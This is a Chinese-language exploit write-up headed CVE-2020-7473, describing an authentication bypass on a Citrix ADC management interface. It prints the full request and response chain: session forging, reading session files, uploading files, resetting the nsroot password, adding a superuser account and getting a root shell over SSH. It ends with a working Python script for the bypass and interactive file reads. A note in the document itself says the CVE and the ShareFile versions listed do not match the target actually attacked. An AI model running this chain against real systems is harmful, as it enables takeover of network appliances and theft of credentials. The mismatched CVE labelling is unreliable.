(CVE-2020-7473)Citrix 认证绕过getshell¶
一、漏洞简介¶
注：下文复现步骤所用的接口（NITRO API、/menu/stc 返回的「Citrix ADC - Statistics」页面以及会话文件中的 nsversion NS12.1）表明实际操作对象是 Citrix ADC 的管理接口，与下一节列出的 ShareFile StorageZones Controller 受影响版本并不对应，核对 CVE 编号时请注意。
二、漏洞影响¶
ShareFile storage zones Controller 5.9.0
ShareFile storage zones Controller 5.8.0
ShareFile storage zones Controller 5.7.0
ShareFile StorageZones Controller 5.6.0
ShareFile StorageZones Controller 5.5.0
及ShareFile StorageZones Controller更早版本
三、复现过程¶
0x01 CreateSession¶
request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3
<appfwprofile><login></login></appfwprofile>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. 
Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
0x02 fix session¶
request
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400
response
HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
0x03 Get rand_key¶
request
GET /menu/stc HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
response
HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Statistics</title>
<link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
<script type="text/javascript">
//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
//rand_key & rand are used in utils.js to avoid CSRF in all POST requests
var rand = "181103693.1594540472072128";
var rand_key = "14247218531594540472072170";
var NSERR_SESSION_EXPIRED = 444;
</script>
...
<p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>
note: var rand = "181103693.1594540472072128";
0x04 re-break Session¶
request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
X-NITRO-USER: mMg96GTR
X-NITRO-PASS: QXom91tz
<appfwprofile><login></login></appfwprofile>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. 
Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
0x05 Read Dir¶
request
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
...
sess_6680400dad3be5585d4ac9880d5f634f...
sess_774dd8a02a254bd09c480cd0ba244598...
sess_6c5c31300c22b200f0273e7a13be47cb....
0x06 Read Session¶
request
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov 4 2019, 22:20:18 (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:
0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";
0x07 UploadFile Getshell¶
You can upload to /root/.ssh/authorized_key. Note: get rand_key and
SESSID from the file sess_[32 characters]
request
POST /rapi/uploadtext HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}
response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8
{"errorcode":"0","message":"Done"}
0x08 ChangePassword && SSH¶
request
PUT /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}
response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot@www.0-sec.org
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost
0x09 CreateUser && SSH¶
request:CreateUser
POST /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}
response:CreateUser
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
request:binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}
response:binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot1@www.0-sec.org
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost#
poc¶
3.png
#!/usr/bin/env python
import requests
import sys
import string
import random
import json
from urllib.parse import quote
# Silence urllib3's warnings: every request below is sent with verify=False
# (TLS certificate validation off), which would otherwise warn on each call.
requests.packages.urllib3.disable_warnings()
def random_string(length=8):
    """Return ``length`` pseudo-random ASCII letters and digits.

    Used by create_session() and do_lfi() to fill the X-NITRO-USER /
    X-NITRO-PASS request headers with throwaway values. Draws from
    ``random`` rather than ``secrets``, so the output is not unpredictable
    in any security sense.

    Args:
        length: number of characters to produce (default 8).

    Returns:
        A ``str`` of exactly ``length`` characters from [A-Za-z0-9].
    """
    alphabet = string.ascii_letters + string.digits
    picks = [random.choice(alphabet) for _ in range(length)]
    return ''.join(picks)
def create_session(base_url, session):
    """Send the session-creating request of the chain and hand ``session`` back.

    Posts an ``<appfwprofile>`` body to ``/pcidss/report`` with fixed query
    parameters and randomly filled ``X-NITRO-USER`` / ``X-NITRO-PASS``
    headers. The response body is discarded; what matters is the cookie jar
    on ``session`` (the writeup's capture shows a ``SESSID`` cookie being set
    on the 406 reply). For detection purposes this exact request shape —
    that ``sid`` value plus random NITRO headers — is characteristic of the
    chain.

    Args:
        base_url: scheme + host[:port], no trailing slash.
        session: a ``requests.Session``; its cookie jar is mutated in place.

    Returns:
        The same ``session`` object, for chaining.

    Note:
        ``verify=False`` disables TLS certificate validation, and the proxy
        mapping only has an ``http`` key, so an ``https`` base URL is
        contacted directly instead of via 127.0.0.1:8080.
    """
    endpoint = '{0}/pcidss/report'.format(base_url)
    query = {
        'type': 'allprofiles',
        'sid': 'loginchallengeresponse1requestbody',
        'username': 'nsroot',
        'set': '1',
    }
    nitro_headers = {
        'Content-Type': 'application/xml',
        'X-NITRO-USER': random_string(),
        'X-NITRO-PASS': random_string(),
    }
    body = '<appfwprofile><login></login></appfwprofile>'
    local_proxy = {"http": "http://127.0.0.1:8080/"}
    session.post(url=endpoint, params=query, headers=nitro_headers,
                 data=body, verify=False, proxies=local_proxy)
    return session
def fix_session(base_url, session):
    """Issue the ``/menu/ss`` GET that the chain uses to "fix" the session.

    Sends ``sid=nsroot&username=nsroot&force_setup=1`` with whatever cookies
    ``session`` already holds. Nothing is returned and the response is not
    inspected; any effect is carried by cookies the server sets on
    ``session`` (the writeup's capture shows ``is_cisco_platform`` being set
    on a 302 reply).

    Args:
        base_url: scheme + host[:port], no trailing slash.
        session: a ``requests.Session`` carrying the earlier SESSID cookie.

    Note:
        Same caveats as the other steps: ``verify=False`` and an
        ``http``-only proxy mapping.
    """
    endpoint = '{0}/menu/ss'.format(base_url)
    query = {'sid': 'nsroot', 'username': 'nsroot', 'force_setup': '1'}
    local_proxy = {"http": "http://127.0.0.1:8080/"}
    session.get(url=endpoint, params=query, verify=False, proxies=local_proxy)
def get_rand(base_url, session):
    """Scrape the ``var rand = "..."`` value from the ``/menu/stc`` page.

    Fetches the page with the session's cookies, scans it line by line for
    the literal ``var rand =`` and returns the text between the first pair
    of double quotes on that line. If several lines match, the last one
    wins (there is no ``break``).

    Args:
        base_url: scheme + host[:port], no trailing slash.
        session: a ``requests.Session`` carrying the earlier cookies.

    Returns:
        The scraped ``rand`` string.

    Raises:
        UnboundLocalError: if no line of the response contains ``var rand =``
        (``rand`` is never assigned). Also propagates whatever the session
        raises on transport failure.
    """
    endpoint = '{0}/menu/stc'.format(base_url)
    local_proxy = {"http": "http://127.0.0.1:8080/"}
    page = session.get(url=endpoint, verify=False, proxies=local_proxy)
    for text_line in page.text.split('\n'):
        if 'var rand =' in text_line:
            rand = text_line.split('"')[1]
    return rand
def do_lfi(base_url, session, rand):
    """Request a server-side path via ``/rapi/filedownload`` and print the body.

    ``PAYLOAD`` (a module global assigned in ``__main__``, already
    percent-encoded) is spliced into the ``filter=path:`` query and ``rand``
    is sent as the ``rand_key`` header. A hit is recognised by the header
    shape seen in the writeup's capture (406 status, a Content-Disposition
    header, ``Accept-Ranges: bytes`` and ``Pragma: private``); after a hit
    the function loops forever prompting for further paths, with no exit
    other than Ctrl-C or EOF on stdin (``input()`` raises EOFError).

    Args:
        base_url: scheme + host[:port], no trailing slash.
        session: a ``requests.Session`` carrying the SESSID cookie from the
            earlier steps.
        rand: the ``rand`` value scraped by get_rand().

    Raises:
        KeyError: if a 406 response carries Content-Disposition but lacks
            Accept-Ranges or Pragma (the ``and`` chain indexes them directly).
    """
    url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
    headers = {
        'Content-Type':'application/xml',
        'X-NITRO-USER':random_string(),
        'X-NITRO-PASS':random_string(),
        'rand_key':rand
    }
    data = '<clipermission></clipermission>'
    # Only an "http" key: https targets are not routed through 127.0.0.1:8080.
    proxies = {"http":"http://127.0.0.1:8080/"}
    r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
    # Serialises the private header store of this first response only.
    # NOTE(review): response_str is never refreshed inside the loop below,
    # so the Content-Disposition test there always reflects this reply.
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
        print ("[+] Send Success!")
        print ("_"*80,"\n\n")
        print (r.text)
        print ("_"*80)
        # Interactive loop: each prompt is percent-encoded the same way as
        # PAYLOAD and sent with the same headers/cookies.
        while 1:
            PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8")
            url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1)
            r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
            if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
                print ("_"*80,"\n\n")
                print (r.text)
                print ("_"*80)
                # pass
    else:
        print ("[+] Error!")
def main(base_url):
    """Run the request steps of the chain in order, printing progress.

    Sequence: create_session → fix_session → get_rand → create_session
    again ("re-break") → do_lfi. All steps share one ``requests.Session``
    so cookies set by earlier replies are sent on later ones.

    Args:
        base_url: scheme + host[:port], no trailing slash.

    Raises:
        KeyError: if the first step did not leave a ``SESSID`` cookie on
            the session.
    """
    print('[-] Creating session..')
    session = requests.Session()
    create_session(base_url, session)
    sessid = session.cookies.get_dict()['SESSID']
    print('[+] Got session: %s' % sessid)
    print('[-] Fixing session..')
    fix_session(base_url, session)
    print('[-] Getting rand..')
    rand = get_rand(base_url, session)
    print('[+] Got rand: %s' % rand)
    print('[-] Re-breaking session..')
    create_session(base_url, session)
    print('[-] Getting file..')
    do_lfi(base_url, session, rand)
if __name__ == '__main__':
    # Usage: <script> <base_url>, where base_url is scheme://host[:port].
    base_url = sys.argv[1]
    # Drop exactly one trailing slash so the '{0}/path' joins in the
    # helpers do not produce a double slash.
    if base_url[-1] == '/':
        base_url = base_url[:-1]
    # Module global read by do_lfi(). Slashes must be URL-encoded in the
    # filter parameter; note that "utf-8" here lands in quote()'s ``safe``
    # positional argument, which (because '/' is then no longer in the safe
    # set) is what causes '/' to be encoded as %2F.
    PAYLOAD = quote(input("[+] Set File= "), "utf-8")
    main(base_url)